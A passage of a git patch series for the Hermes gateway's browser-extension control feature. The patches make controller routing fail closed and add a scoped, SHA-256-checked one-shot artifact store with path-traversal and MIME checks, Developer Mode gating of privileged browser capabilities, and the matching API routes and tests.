controller_id="controller-fixture", + browser_profile_id="browser-profile-fixture", + transport_family="local-api", + capabilities=frozenset({"browser_snapshot"}), + ) + broker.attach(scope, lambda _frame: None, owner="socket-fixture") + monkeypatch.setattr( + "gateway.browser_control_broker.browser_control_enabled", + lambda: True, + ) + monkeypatch.setattr( + "gateway.browser_control_broker.get_browser_control_broker", + lambda: broker, + ) + tokens = set_session_vars( + session_id="session-fixture", + browser_control_principal="principal-fixture", + browser_control_transport_family="local-api", + ) + fallbacks = [] + try: + assert browser_extension_router.extension_controller_available( + "browser_snapshot" + ) is True + assert broker.disconnect_owner("socket-fixture") == 1 + with pytest.raises(ControllerUnavailable, match="browser_snapshot"): + routed_browser_handler( + "browser_snapshot", + {}, + fallback=lambda: fallbacks.append(True) or "unsafe-legacy-result", + ) + finally: + clear_session_vars(tokens) + broker.reset() + + assert fallbacks == [] + + def test_routeable_browser_tools_preserve_legacy_gate_without_bound_identity(monkeypatch): """A feature flag alone must not advertise tools outside a bound request.""" from gateway import browser_control_broker diff --git a/tools/browser_extension_router.py b/tools/browser_extension_router.py index 34e1aa5918..7c4cc6cbc6 100644 --- a/tools/browser_extension_router.py +++ b/tools/browser_extension_router.py @@ -13,15 +13,13 @@ Routing contract (exercised by ``tests/tools/test_browser_extension_router.py``) default: ``browser.extension_control.enabled`` is false unless explicitly configured, so every real browser action keeps its exact legacy path. -- **No exact server-bound scope ⇒ legacy.** ``broker.scope_for_session(...)`` - must return exactly one attached controller scope for the caller's session, - authenticated principal, and transport family. Missing identity, no match, - or ambiguity preserves the existing backend. +- **No server-bound identity ⇒ legacy.** Generic Hermes callers keep the + existing backend when no authenticated browser-controller identity is bound. -- **No exact capable controller ⇒ legacy.** ``broker.select(scope, action)`` - must return a controller whose capability set contains the action. - Controllers currently register with only ``controller.noop``, so real - browser actions never match and always fall back. +- **Bound identity ⇒ authoritative extension lane.** Once the gateway binds a + browser-controller principal and transport family, missing/ambiguous scope, + disconnect, or capability mismatch fail closed. A "control this tab" turn + must never jump to an unrelated local/cloud browser backend. - **Selected controller ⇒ authoritative.** Once a controller is selected the command is dispatched to it and its result returned; the legacy backend @@ -111,9 +109,9 @@ def route_browser_tool( args: Tool arguments as received from the model. Never mutated. fallback: - The existing backend handler, called exactly once when the router - decides the extension path must not run (feature off, no scope, or - no capable controller). Must be a zero-argument callable. + The existing backend handler, called exactly once when the feature is + off or no server-bound controller identity exists. Must be a + zero-argument callable. broker: Object exposing ``scope_for_session(**identity) -> scope|None``, ``select(scope, capability) -> controller|None`` and @@ -125,7 +123,8 @@ def route_browser_tool( Caller session hints forwarded to ``scope_for_session``. principal_id/transport_family: Server-bound caller identity. Both are mandatory when the feature is - enabled; missing values fail closed to the existing backend. + enabled; missing values preserve the existing backend for generic + Hermes callers. tool_call_id: Caller tool-call id forwarded verbatim to ``dispatch``. @@ -148,13 +147,19 @@ def route_browser_tool( transport_family=transport_family, ) if scope is None: - # No unambiguous attached session scope: preserve existing backend. - return fallback() + from gateway.browser_control_broker import ControllerUnavailable + + raise ControllerUnavailable( + f"bound browser controller unavailable for {action}" + ) controller = broker.select(scope, action) if controller is None: - # No controller capable of this exact action: preserve existing backend. - return fallback() + from gateway.browser_control_broker import ControllerUnavailable + + raise ControllerUnavailable( + f"bound browser controller cannot execute {action}" + ) # A controller was selected: it is authoritative. Never retry through the # existing backend, whatever happens here. Registry handlers must return a diff --git a/website/docs/user-guide/features/api-server.md b/website/docs/user-guide/features/api-server.md index 18dd5f4e62..9d0d587ca4 100644 --- a/website/docs/user-guide/features/api-server.md +++ b/website/docs/user-guide/features/api-server.md @@ -298,6 +298,14 @@ Requested capabilities outside that list are filtered out. Raw CDP, arbitrary script evaluation, console access, uploads, image extraction, and vision are not part of the controller protocol. +When a request has no bound controller identity, or when the feature is disabled, +Hermes preserves the existing browser backend. Once the gateway binds a +controller principal and transport family to the request, that extension lane +is authoritative: missing, ambiguous, disconnected, or incapable controllers +fail closed instead of silently switching to a different local/cloud browser. +After an exact controller is selected, its result or error is authoritative and +Hermes never retries the same action through another backend. + ### Local API registration 1. Send an authenticated `POST /v1/browser-control/register` with From 1977c3d2ebb486501a126ce7a97a2fcdf78710d6 Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Wed, 19 Aug 2026 23:08:41 +0700 Subject: [PATCH 014/161] feat(browser): add scoped artifact endpoints, broker permission gates, and companion journal --- gateway/browser_control_artifacts.py | 493 +++++++++++++++ gateway/browser_control_broker.py | 154 ++++- gateway/platforms/api_server.py | 337 +++++++++- .../gateway/test_browser_control_artifacts.py | 591 ++++++++++++++++++ 4 files changed, 1570 insertions(+), 5 deletions(-) create mode 100644 gateway/browser_control_artifacts.py create mode 100644 tests/gateway/test_browser_control_artifacts.py diff --git a/gateway/browser_control_artifacts.py b/gateway/browser_control_artifacts.py new file mode 100644 index 0000000000..fd07af1234 --- /dev/null +++ b/gateway/browser_control_artifacts.py @@ -0,0 +1,493 @@ +"""One-shot artifact transport for browser control (Gateway side). + +Phase 8 Task 29: authenticated one-shot HTTPS upload/download of bounded +browser-control artifacts (screenshots, PDFs, uploads) with SHA-256 +validation, exact MIME/size caps, a controlled artifact root, and TTL +cleanup. This module is the transport-neutral store core: it knows nothing +about aiohttp or the API server — the routes in +:mod:`gateway.platforms.api_server` authenticate callers and enforce rate +limits, then hand bytes to this store. + +Why a store at all: the controller WebSocket is a command channel, not a +file pipe. A controller action that needs bytes (a screenshot upload, a +downloaded PDF) references an artifact by its server-minted id; the agent +side later retrieves it over HTTPS. Base64 screenshots or files in +controller WebSocket frames are therefore structurally impossible: the +frame carries only ``artifact_id`` strings, and the bytes live on disk +under a controlled root for a short TTL. + +Contract (exercised by tests/gateway/test_browser_control_artifacts.py): + +- **Server-minted ids, no traversal.** ``store`` assigns a fresh random hex + id; ``_artifact_path`` accepts only ``[0-9a-f]{N}`` ids and resolves them + strictly inside the root. Client-supplied filenames are metadata only + and never become filesystem paths. + +- **Exact size and MIME caps.** ``store`` rejects bytes above + ``max_bytes`` and any content type outside the configured allowlist + before anything touches the disk. + +- **SHA-256 provenance.** Every artifact is stored with its ``sha256``, + returned in the receipt, and re-verified by ``load``/``validate`` so a + corrupted or tampered file can never be handed to a caller. + +- **One-shot, scope-bound downloads.** ``load`` requires the exact scope + key the artifact was stored under and deletes the artifact atomically on + success. ``validate`` (used by the broker for "approved artifact id + only" gating) checks existence, TTL, and scope without consuming. + +- **No overwrite.** Ids are random and ``store`` refuses to overwrite an + existing id (a collision is retried with a fresh id). + +- **TTL cleanup.** ``prune_expired`` removes expired entries; the API + server sweeps on demand. Nothing in the store is allowed to outlive its + TTL by more than the sweep interval. + +Thread-safety: the in-memory index is guarded by a lock; files are written +to a temp name and atomically renamed into place so a concurrent ``load`` +never observes a partially written artifact. +""" + +from __future__ import annotations + +import hashlib +import logging +import os +import re +import secrets +import threading +import time +from dataclasses import dataclass +from pathlib import Path +from typing import Any, Callable, Optional + +logger = logging.getLogger(__name__) + +#: Default lifetime of a stored artifact, in clock seconds. +DEFAULT_ARTIFACT_TTL_SECONDS = 300.0 +#: Default per-artifact byte cap (10 MiB). +DEFAULT_MAX_ARTIFACT_BYTES = 10 * 1024 * 1024 +#: Default exact MIME allowlist. Unknown or parameterized variants are +#: rejected; clients must send the canonical registered type. +DEFAULT_ALLOWED_MIME_TYPES = frozenset( + { + "application/json", + "application/pdf", + "image/gif", + "image/jpeg", + "image/png", + "image/webp", + "text/plain", + } +) +#: Length in hex chars of a minted artifact id. +_ARTIFACT_ID_HEX = 32 +_ARTIFACT_ID_RE = re.compile(r"^[0-9a-f]{32}$") +_TEMP_SUFFIX = ".tmp" + + +class ArtifactError(Exception): + """Base class for artifact store contract failures.""" + + +class ArtifactNotFound(ArtifactError): + """The artifact id is unknown (or already consumed).""" + + +class ArtifactExpired(ArtifactError): + """The artifact outlived its TTL.""" + + +class ArtifactTooLarge(ArtifactError): + """The upload exceeds the configured byte cap.""" + + +class ArtifactMimeRejected(ArtifactError): + """The content type is outside the exact allowlist.""" + + +class ArtifactScopeMismatch(ArtifactError): + """The artifact exists but belongs to a different scope.""" + + +class ArtifactChecksumMismatch(ArtifactError): + """The stored bytes do not match the recorded SHA-256.""" + + +class ArtifactTraversal(ArtifactError): + """A caller-supplied id is not a valid minted artifact id.""" + + +class ArtifactOverwrite(ArtifactError): + """An artifact id already exists and the store refuses to overwrite it.""" + + +@dataclass(frozen=True) +class ArtifactReceipt: + """Provenance record returned to the caller of ``store``.""" + + artifact_id: str + sha256: str + size_bytes: int + content_type: str + filename: str + created_at: float + expires_at: float + ttl_seconds: float + scope_key: str + + def to_dict(self, *, download_path: str = "") -> dict[str, Any]: + """Serialize to the wire receipt (never contains file paths).""" + receipt = { + "artifact_id": self.artifact_id, + "sha256": self.sha256, + "size_bytes": self.size_bytes, + "content_type": self.content_type, + "filename": self.filename, + "created_at": self.created_at, + "expires_at": self.expires_at, + "ttl_seconds": self.ttl_seconds, + "one_shot": True, + } + if download_path: + receipt["download_path"] = download_path + return receipt + + +def artifact_scope_key(scope: Any) -> str: + """Derive the stable scope key an artifact is bound to. + + Only server-derived identity fields participate: principal (mandatory), + plus session and transport family when the caller resolved them + (mirroring the broker's exact-identity contract). Capabilities and + optional ids are intentionally excluded so a reconnect that refreshes + the same controller keeps its artifacts. + + The API-server artifact routes authenticate by API key and bind to the + derived principal; the broker additionally binds to the full + controller scope. A principal-only key and a full controller key + never collide because the digest input differs. + """ + principal = "" + session = "" + family = "" + try: + principal = str(getattr(scope, "principal_id", "") or "") + session = str(getattr(scope, "session_id", "") or "") + family = str(getattr(scope, "transport_family", "") or "") + except Exception: + pass + if not principal: + # Fail closed: an artifact can only be minted for an authenticated + # principal. + raise ArtifactError("artifact scope must carry a resolved principal") + material = f"{principal}\x00{session}\x00{family}".encode("utf-8") + return hashlib.sha256(material).hexdigest() + + +def _sha256(data: bytes) -> str: + return hashlib.sha256(data).hexdigest() + + +@dataclass +class _ArtifactEntry: + receipt: ArtifactReceipt + path: Path + + +class ArtifactStore: + """Thread-safe, TTL-bounded, scope-bound one-shot artifact store.""" + + def __init__( + self, + root: Path, + *, + ttl_seconds: float = DEFAULT_ARTIFACT_TTL_SECONDS, + max_bytes: int = DEFAULT_MAX_ARTIFACT_BYTES, + allowed_mime_types: frozenset = DEFAULT_ALLOWED_MIME_TYPES, + clock: Optional[Callable[[], float]] = None, + ) -> None: + self._root = Path(root) + self._root.mkdir(parents=True, exist_ok=True) + self._ttl_seconds = max(1.0, float(ttl_seconds)) + self._max_bytes = max(1, int(max_bytes)) + self._allowed_mime_types = frozenset(allowed_mime_types) + self._clock = clock if clock is not None else time.time + self._lock = threading.RLock() + self._entries: dict[str, _ArtifactEntry] = {} + + # ------------------------------------------------------------------ + # Public API + # ------------------------------------------------------------------ + + @property + def root(self) -> Path: + """Controlled artifact root (never exposed to callers by default).""" + return self._root + + @property + def ttl_seconds(self) -> float: + return self._ttl_seconds + + @property + def max_bytes(self) -> int: + return self._max_bytes + + @property + def allowed_mime_types(self) -> frozenset: + return self._allowed_mime_types + + def store( + self, + data: bytes, + *, + filename: str, + content_type: str, + scope: Any, + ) -> ArtifactReceipt: + """Validate and store one artifact, returning its provenance receipt. + + Raises :class:`ArtifactTooLarge` / :class:`ArtifactMimeRejected` + before any disk write; :class:`ArtifactError` if the scope is not a + fully resolved browser-control scope. + """ + size = len(data) + if size > self._max_bytes: + raise ArtifactTooLarge( + f"artifact is {size} bytes; cap is {self._max_bytes}" + ) + normalized_type = _normalize_content_type(content_type) + if normalized_type not in self._allowed_mime_types: + raise ArtifactMimeRejected( + f"content type {content_type!r} is outside the exact allowlist" + ) + scope_key = artifact_scope_key(scope) + now = self._clock() + + # Mint a fresh id; retry on an astronomically unlikely collision. + while True: + artifact_id = secrets.token_hex(_ARTIFACT_ID_HEX // 2) + target = self._artifact_path(artifact_id) + with self._lock: + if artifact_id in self._entries: + continue + if target.exists(): + continue + receipt = ArtifactReceipt( + artifact_id=artifact_id, + sha256=_sha256(data), + size_bytes=size, + content_type=normalized_type, + filename=_bounded_filename(filename), + created_at=now, + expires_at=now + self._ttl_seconds, + ttl_seconds=self._ttl_seconds, + scope_key=scope_key, + ) + entry = _ArtifactEntry(receipt=receipt, path=target) + self._entries[artifact_id] = entry + break + + # Write via temp + atomic rename so readers never observe a + # partially written artifact. + temp = target.with_name(f"{target.name}{_TEMP_SUFFIX}") + try: + with open(temp, "wb") as handle: + handle.write(data) + handle.flush() + os.fsync(handle.fileno()) + os.replace(temp, target) + except Exception: + with self._lock: + self._entries.pop(artifact_id, None) + try: + temp.unlink(missing_ok=True) + except Exception: + pass + raise + return receipt + + def validate(self, artifact_id: str, *, scope: Any) -> ArtifactReceipt: + """Return the receipt when the artifact is live for ``scope``. + + Used by the broker's "approved artifact id only" gate: checks + existence, TTL, and scope without consuming the artifact. Raises + the appropriate :class:`ArtifactError` subclass otherwise. + """ + return self._entry_for(artifact_id, scope=scope).receipt + + def load(self, artifact_id: str, *, scope: Any) -> tuple[bytes, ArtifactReceipt]: + """One-shot download: verify, read, checksum, then consume. + + Returns ``(bytes, receipt)`` and atomically deletes the artifact so + a second ``load`` raises :class:`ArtifactNotFound`. Raises + :class:`ArtifactChecksumMismatch` (without consuming) if the file + on disk does not match the recorded SHA-256. + """ + with self._lock: + entry = self._entry_for(artifact_id, scope=scope) + path = entry.path + if not path.exists(): + self._entries.pop(artifact_id, None) + raise ArtifactNotFound(f"artifact {artifact_id!r} is gone") + try: + data = path.read_bytes() + except OSError as exc: + raise ArtifactError(f"artifact read failed: {exc}") from exc + if _sha256(data) != entry.receipt.sha256: + raise ArtifactChecksumMismatch( + f"artifact {artifact_id!r} failed SHA-256 validation" + ) + # Consume atomically: remove the index entry first so a + # concurrent load fails closed, then delete the file. + self._entries.pop(artifact_id, None) + try: + path.unlink(missing_ok=True) + except OSError: + logger.warning("artifact %s: file removal failed; TTL sweep will retry", artifact_id) + return data, entry.receipt + + def prune_expired(self, now: Optional[float] = None) -> int: + """Delete every artifact past its TTL; return the count removed. + + Also removes orphaned temp files older than one sweep. Idempotent + and safe to call on any request or a periodic sweep. + """ + now = self._clock() if now is None else float(now) + removed = 0 + with self._lock: + for artifact_id, entry in list(self._entries.items()): + if entry.receipt.expires_at <= now: + self._entries.pop(artifact_id, None) + try: + entry.path.unlink(missing_ok=True) + except OSError: + pass + removed += 1 + for temp in self._root.glob(f"*{_TEMP_SUFFIX}"): + try: + if temp.stat().st_mtime <= now - self._ttl_seconds: + temp.unlink(missing_ok=True) + except OSError: + continue + return removed + + def count(self) -> int: + """Number of live (unconsumed, not-yet-pruned) artifacts.""" + with self._lock: + return len(self._entries) + + # ------------------------------------------------------------------ + # Internals + # ------------------------------------------------------------------ + + def _entry_for(self, artifact_id: str, *, scope: Any) -> _ArtifactEntry: + path = self._artifact_path(artifact_id) + scope_key = artifact_scope_key(scope) + now = self._clock() + with self._lock: + entry = self._entries.get(artifact_id) + # Check the target's own expiry BEFORE sweeping other entries so + # an expired artifact surfaces as ArtifactExpired rather than + # silently vanishing into the sweep. + if entry is None: + self._prune_expired_locked(now) + entry = self._entries.get(artifact_id) + if entry is None: + raise ArtifactNotFound(f"unknown artifact {artifact_id!r}") + if entry.receipt.expires_at <= now: + self._entries.pop(artifact_id, None) + try: + path.unlink(missing_ok=True) + except OSError: + pass + raise ArtifactExpired(f"artifact {artifact_id!r} expired") + if entry.receipt.scope_key != scope_key: + raise ArtifactScopeMismatch( + f"artifact {artifact_id!r} is bound to a different scope" + ) + return entry + + def _prune_expired_locked(self, now: float) -> None: + for artifact_id, entry in list(self._entries.items()): + if entry.receipt.expires_at <= now: + self._entries.pop(artifact_id, None) + try: + entry.path.unlink(missing_ok=True) + except OSError: + pass + + def _artifact_path(self, artifact_id: str) -> Path: + """Resolve a minted id strictly inside the controlled root.""" + if not isinstance(artifact_id, str) or not _ARTIFACT_ID_RE.fullmatch(artifact_id): + raise ArtifactTraversal(f"invalid artifact id {artifact_id!r}") + candidate = (self._root / artifact_id).resolve() + try: + root_resolved = self._root.resolve() + except OSError: + root_resolved = self._root.absolute() + if candidate.parent != root_resolved or candidate.name != artifact_id: + raise ArtifactTraversal(f"artifact path escapes root for {artifact_id!r}") + return candidate + + +def _normalize_content_type(value: str) -> str: + """Return the canonical MIME type, or ``""`` for malformed input.""" + if not isinstance(value, str): + return "" + return value.strip().split(";", 1)[0].strip().lower() + + +def _bounded_filename(value: str, limit: int = 160) -> str: + """Sanitize a display-only filename; never used as a filesystem path.""" + if not isinstance(value, str): + return "" + cleaned = value.strip().replace("\\", "_").replace("/", "_") + cleaned = "".join(character for character in cleaned if ord(character) >= 32) + return cleaned[:limit] + + +# ---------------------------------------------------------------------- +# Rate limiting (route-level, per principal) +# ---------------------------------------------------------------------- + + +class ArtifactRateLimiter: + """Sliding-window per-key limiter for artifact routes. + + The API server keys this by the authenticated principal so a single + key cannot flood the store. Injected clock makes tests deterministic. + """ + + def __init__( + self, + *, + window_seconds: float = 60.0, + max_requests: int = 30, + clock: Optional[Callable[[], float]] = None, + ) -> None: + self._window_seconds = max(1.0, float(window_seconds)) + self._max_requests = max(1, int(max_requests)) + self._clock = clock if clock is not None else time.time + self._lock = threading.Lock() + self._hits: dict[str, list[float]] = {} + + def allow(self, key: str) -> bool: + """Return True when ``key`` is under the window cap; else False.""" + if not isinstance(key, str) or not key: + return False + now = self._clock() + window_start = now - self._window_seconds + with self._lock: + hits = [hit for hit in self._hits.get(key, []) if hit > window_start] + if len(hits) >= self._max_requests: + self._hits[key] = hits + return False + hits.append(now) + self._hits[key] = hits + return True + + def reset(self, key: str) -> None: + """Drop the recorded hits for ``key`` (tests/diagnostics).""" + with self._lock: + self._hits.pop(key, None) diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index 4ed28d48fc..e66105d921 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -105,25 +105,96 @@ BROWSER_CONTROL_CAPABILITIES = frozenset( } ) +#: Privileged capabilities (Phase 8 Task 30) that are never negotiable through +#: the base allowlist. ``browser_evaluate`` executes JavaScript in the page +#: context; ``browser_cdp`` is raw CDP. Both are fail-closed unless the broker +#: runs in Developer Mode (``browser.extension_control.developer_mode``) AND +#: the controller explicitly negotiated the capability. +BROWSER_CONTROL_DEVELOPER_CAPABILITIES = frozenset( + { + "browser_cdp", + "browser_evaluate", + } +) + +#: Artifact-transport capabilities (Phase 8 Task 29). These are regular +#: (non-developer) capabilities because upload/download of bounded, validated +#: artifacts is a safe surface; the payloads are never carried in controller +#: frames. Artifact actions are dispatched only after the broker validates the +#: referenced artifact id against the attached store ("approved artifact id +#: only"). +BROWSER_CONTROL_ARTIFACT_CAPABILITIES = frozenset( + { + "browser_artifact_download", + "browser_artifact_upload", + } +) + +#: The complete set a controller may negotiate: base + artifact. Developer +#: capabilities are admitted by :func:`filter_browser_control_capabilities` +#: only when Developer Mode is enabled. +BROWSER_CONTROL_ALL_CAPABILITIES = frozenset( + BROWSER_CONTROL_CAPABILITIES + | BROWSER_CONTROL_ARTIFACT_CAPABILITIES + | BROWSER_CONTROL_DEVELOPER_CAPABILITIES +) + def browser_control_protocol_supported(value: Any) -> bool: """Return whether ``value`` names the exact supported wire version.""" return type(value) is int and value == BROWSER_CONTROL_PROTOCOL_VERSION -def filter_browser_control_capabilities(value: Any) -> frozenset: +def browser_control_developer_mode(config: Optional[dict] = None) -> bool: + """Return the explicit Developer Mode flag (disabled by default). + + Reads ``browser.extension_control.developer_mode`` from the global + config. Developer Mode is the *additional* gate for ``browser_evaluate`` + and raw CDP; it never widens the base action allowlist on its own. + """ + if config is None: + try: + from hermes_cli.config import load_config + + config = load_config() + except Exception: + return False + if not isinstance(config, dict): + return False + browser = config.get("browser") + if not isinstance(browser, dict): + return False + extension_control = browser.get("extension_control") + if not isinstance(extension_control, dict): + return False + return extension_control.get("developer_mode", False) is True + + +def filter_browser_control_capabilities( + value: Any, + *, + developer_mode: Optional[bool] = None, +) -> frozenset: """Return the permitted subset of a JSON/RPC capability list. A malformed non-list value has no capabilities. Unknown or non-string entries are ignored; registration rejects an empty returned set. + + Base and artifact capabilities always pass. Developer capabilities + (``browser_evaluate``, ``browser_cdp``) pass only when Developer Mode + is explicitly enabled — either passed in or read from the live config. """ if not isinstance(value, list): return frozenset() + allowed = frozenset(BROWSER_CONTROL_CAPABILITIES | BROWSER_CONTROL_ARTIFACT_CAPABILITIES) + if developer_mode is None: + developer_mode = browser_control_developer_mode() + if developer_mode is True: + allowed = frozenset(allowed | BROWSER_CONTROL_DEVELOPER_CAPABILITIES) return frozenset( capability for capability in value - if isinstance(capability, str) - and capability in BROWSER_CONTROL_CAPABILITIES + if isinstance(capability, str) and capability in allowed ) #: Wire method names for controller frames. Transport-neutral by contract: @@ -251,6 +322,7 @@ class BrowserControlBroker: ticket_ttl: float = DEFAULT_TICKET_TTL, command_timeout: float = DEFAULT_COMMAND_TIMEOUT, clock: Optional[Callable[[], float]] = None, + developer_mode: Optional[bool] = None, ) -> None: self._ticket_ttl = ticket_ttl self._command_timeout = command_timeout @@ -259,6 +331,29 @@ class BrowserControlBroker: self._tickets: Dict[str, _TicketRecord] = {} self._controllers: Dict[ControllerScope, _Controller] = {} self._pending: Dict[str, _PendingCommand] = {} + # Developer Mode gates privileged capabilities (browser_evaluate, + # browser_cdp). None defers to the live config on every dispatch so + # a mid-process config change is honored without restart; an explicit + # bool pins the gate for tests and multi-tenant hosts. + if developer_mode is None: + developer_mode = browser_control_developer_mode() + self._developer_mode = developer_mode is True + self._artifact_store: Any = None + + def attach_artifact_store(self, store: Any) -> None: + """Attach the process artifact store for "approved artifact id only". + + ``store`` must expose ``validate(artifact_id, *, scope) -> receipt`` + raising the artifacts module's :class:`ArtifactError` subclasses. + None clears the reference; dispatching an artifact action without a + store fails closed. + """ + self._artifact_store = store + + @property + def developer_mode(self) -> bool: + """Whether privileged capabilities may be selected/dispatched.""" + return self._developer_mode # ------------------------------------------------------------------ # Registration tickets @@ -403,7 +498,16 @@ class BrowserControlBroker: matches the stable identity fields, then checks the attached controller's current negotiated capability set. Offline controllers preserve old pending work but never accept new dispatches. + + Privileged capabilities (``browser_evaluate``, ``browser_cdp``) are + additionally gated on Developer Mode: with the gate off they are + never selectable, even when a controller somehow negotiated them. """ + if ( + capability in BROWSER_CONTROL_DEVELOPER_CAPABILITIES + and not self._developer_mode + ): + return None with self._lock: matches = [ controller @@ -520,6 +624,14 @@ class BrowserControlBroker: Exactly one pending command exists per command id; ``complete`` is single-shot, so a command can never resolve twice. + + Artifact actions (``browser_artifact_upload`` / + ``browser_artifact_download``) additionally require an attached + artifact store and a live, scope-bound artifact reference: the + ``arguments`` mapping must carry an ``artifact_id`` whose validation + passes against the store ("approved artifact id only"). The payload + is never carried in the frame — only the id travels to the + controller. """ controller = self.select(scope, action) if controller is None: @@ -527,13 +639,17 @@ class BrowserControlBroker: f"no controller for scope {scope!r} with capability {action!r}" ) + arguments = dict(arguments or {}) + if action in BROWSER_CONTROL_ARTIFACT_CAPABILITIES: + self._validate_artifact_reference(scope, action, arguments) + command_id = secrets.token_hex(16) frame = { "method": FRAME_COMMAND, "params": { "command_id": command_id, "action": action, - "arguments": dict(arguments or {}), + "arguments": arguments, "controller_id": scope.controller_id, "browser_profile_id": scope.browser_profile_id, "tool_call_id": tool_call_id, @@ -698,6 +814,36 @@ class BrowserControlBroker: del self._pending[pending.command_id] pending.event.set() + def _validate_artifact_reference( + self, + scope: ControllerScope, + action: str, + arguments: dict, + ) -> None: + """Fail closed unless ``arguments`` carries an approved artifact id. + + The store is consulted through the duck-typed ``validate`` contract + (raises :class:`ArtifactError` subclasses on any problem), so the + broker never guesses at artifact validity: missing store, missing id, + traversal, expiry, checksum, or scope mismatch all surface as + :class:`ControllerRejected` before any frame is emitted. + """ + if self._artifact_store is None: + raise ControllerRejected( + f"{action} requires an attached artifact store" + ) + artifact_id = arguments.get("artifact_id") + if not isinstance(artifact_id, str) or not artifact_id.strip(): + raise ControllerRejected(f"{action} requires a non-empty artifact_id") + try: + self._artifact_store.validate(artifact_id.strip(), scope=scope) + except ControllerRejected: + raise + except Exception as exc: + raise ControllerRejected( + f"{action} rejected artifact reference {artifact_id!r}: {exc}" + ) from exc + @staticmethod def _cancel_frame(pending: _PendingCommand) -> dict: return { diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index b0e9ce8714..f393ba8b8c 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -78,6 +78,21 @@ _api_request_browser_control_transport_family: ContextVar[str] = ContextVar( "api_server_browser_control_transport_family", default="" ) +#: Minimal scope shape accepted by :func:`gateway.browser_control_artifacts +#: .artifact_scope_key`: principal + session + transport family. The API +#: server authenticates the caller itself, so the facade carries only the +#: server-derived principal and the loopback/remote family. +class _ArtifactScopeFacade: + __slots__ = ("principal_id", "session_id", "transport_family") + + def __init__(self, principal_id: str, *, session_id: str = "", transport_family: str = ""): + self.principal_id = principal_id + self.session_id = session_id + self.transport_family = transport_family + + def __repr__(self) -> str: # pragma: no cover - debugging aid + return f"_ArtifactScopeFacade(principal={self.principal_id!r})" + #: Browser-extension control protocol version advertised in capabilities and #: echoed in registration responses. Strict validation is centralized in the #: broker's ``browser_control_protocol_supported`` helper. @@ -109,10 +124,22 @@ from gateway.platforms.base import ( from agent.redact import redact_sensitive_text from agent.interrupt_compat import request_hard_interrupt from gateway.readiness import collect_runtime_readiness +from gateway.browser_control_artifacts import ( + ArtifactError, + ArtifactRateLimiter, + ArtifactStore, + ArtifactTooLarge, + DEFAULT_ALLOWED_MIME_TYPES, + DEFAULT_MAX_ARTIFACT_BYTES, + DEFAULT_ARTIFACT_TTL_SECONDS, +) from gateway.browser_control_broker import ( + BROWSER_CONTROL_ARTIFACT_CAPABILITIES, BROWSER_CONTROL_CAPABILITIES, + BROWSER_CONTROL_DEVELOPER_CAPABILITIES, ControllerScope, TicketInvalid, + browser_control_developer_mode, browser_control_protocol_supported, filter_browser_control_capabilities, get_browser_control_broker, @@ -1556,6 +1583,11 @@ class APIServerAdapter(BasePlatformAdapter): # and command lifecycle shared with the dashboard Gateway transport. This adapter only maps HTTP registration and the # controller WebSocket onto the broker; it owns no broker state. self._browser_control_broker = get_browser_control_broker() + # One-shot artifact transport (Phase 8 Task 29). Lazy store + limiter + # are created on first authenticated artifact use; tests inject their + # own store/limiter via _inject_browser_control_artifacts(). + self._browser_control_artifacts: Optional[ArtifactStore] = None + self._browser_control_artifact_limiter: Optional[ArtifactRateLimiter] = None def active_agent_work_count(self) -> int: """Return all live agent work owned by this API adapter. @@ -2161,6 +2193,12 @@ class APIServerAdapter(BasePlatformAdapter): # and API-key auth (see the handlers for the exact status ladder). ("POST", "/v1/browser-control/register", self._handle_browser_control_register), ("GET", "/v1/browser-control/ws", self._handle_browser_control_ws), + # One-shot artifact transport (Phase 8 Task 29): bounded, SHA-256 + # validated HTTPS upload/download bound to a browser-control + # scope. Gated identically to registration (feature flag + API + # key) plus per-principal rate limits. + ("POST", "/v1/artifacts/upload", self._handle_artifact_upload), + ("GET", "/v1/artifacts/download/{artifact_id}", self._handle_artifact_download), ("GET", "/v1/skills", self._handle_skills), ("GET", "/v1/toolsets", self._handle_toolsets), ("GET", "/api/sessions", self._handle_list_sessions), @@ -3299,6 +3337,19 @@ class APIServerAdapter(BasePlatformAdapter): "enabled": self._browser_control_enabled(), "protocol_version": _BROWSER_CONTROL_PROTOCOL_VERSION, "capabilities": sorted(BROWSER_CONTROL_CAPABILITIES), + "artifact_capabilities": sorted(BROWSER_CONTROL_ARTIFACT_CAPABILITIES), + "developer_capabilities": sorted(BROWSER_CONTROL_DEVELOPER_CAPABILITIES), + "developer_mode": self._browser_control_developer_mode(), + "artifact_transport": { + "upload": {"method": "POST", "path": "/v1/artifacts/upload"}, + "download": { + "method": "GET", + "path": "/v1/artifacts/download/{artifact_id}", + }, + "max_bytes": DEFAULT_MAX_ARTIFACT_BYTES, + "ttl_seconds": DEFAULT_ARTIFACT_TTL_SECONDS, + "allowed_mime_types": sorted(DEFAULT_ALLOWED_MIME_TYPES), + }, "real_browser_actions": True, "transports": { "local_vps": "websocket-subprotocol-ticket", @@ -3333,6 +3384,11 @@ class APIServerAdapter(BasePlatformAdapter): "session_model_lock": {"method": "POST", "path": "/api/sessions/{session_id}/model"}, "browser_control_register": {"method": "POST", "path": "/v1/browser-control/register"}, "browser_control_ws": {"method": "GET", "path": "/v1/browser-control/ws"}, + "artifact_upload": {"method": "POST", "path": "/v1/artifacts/upload"}, + "artifact_download": { + "method": "GET", + "path": "/v1/artifacts/download/{artifact_id}", + }, }, }) @@ -3437,7 +3493,8 @@ class APIServerAdapter(BasePlatformAdapter): profile = _api_request_profile.get() or "default" capabilities = filter_browser_control_capabilities( - payload.get("capabilities") + payload.get("capabilities"), + developer_mode=self._browser_control_developer_mode(), ) if not capabilities: return web.json_response( @@ -3447,6 +3504,20 @@ class APIServerAdapter(BasePlatformAdapter): ), status=400, ) + # Developer capabilities may only be negotiated while the broker + # itself runs in Developer Mode (fail closed even if a registration + # somehow slipped through the filter). + if ( + capabilities & BROWSER_CONTROL_DEVELOPER_CAPABILITIES + and not self._browser_control_developer_mode() + ): + return web.json_response( + _openai_error( + "Developer Mode is required for browser_evaluate and raw CDP.", + code="browser_control_developer_mode_required", + ), + status=403, + ) scope = ControllerScope( principal_id=self._derive_browser_control_principal(profile), profile_id=profile, @@ -3661,6 +3732,270 @@ class APIServerAdapter(BasePlatformAdapter): return "local-api" return "remote-api" + def _browser_control_developer_mode(self) -> bool: + """Developer Mode flag; False unless explicitly enabled. + + Mirrors the 